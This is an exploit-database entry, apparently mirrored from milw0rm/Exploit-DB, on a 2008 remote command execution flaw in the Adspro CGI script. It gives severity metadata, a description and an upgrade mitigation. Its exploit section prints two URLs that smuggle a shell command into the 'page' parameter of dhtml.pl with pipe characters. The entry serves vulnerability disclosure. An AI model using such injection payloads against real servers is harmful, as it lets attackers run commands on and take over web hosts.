header-logo
Suggest Exploit
vendor:
Adspro
by:
S0l1D
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Adspro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Adspro Script Remote Command Execution

Adspro is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary commands in the context of the webserver process. Successful exploits will result in the complete compromise of the affected computer.

Mitigation:

Adspro should be upgraded to the latest version to address this issue.
Source

Exploit-DB raw data:

<~\Adspro Script Remote Command Execution/~>

[~]Author       S0l1D
[~]Script        Adspro
[~]Homepage http://adspro.mhfmedia.com/index.shtm

**
~\Exploit/~

http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_top.htm|id|
http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_login.htm|id|

# milw0rm.com [2008-10-26]

Navigation

Suggest Exploit

Services By CQR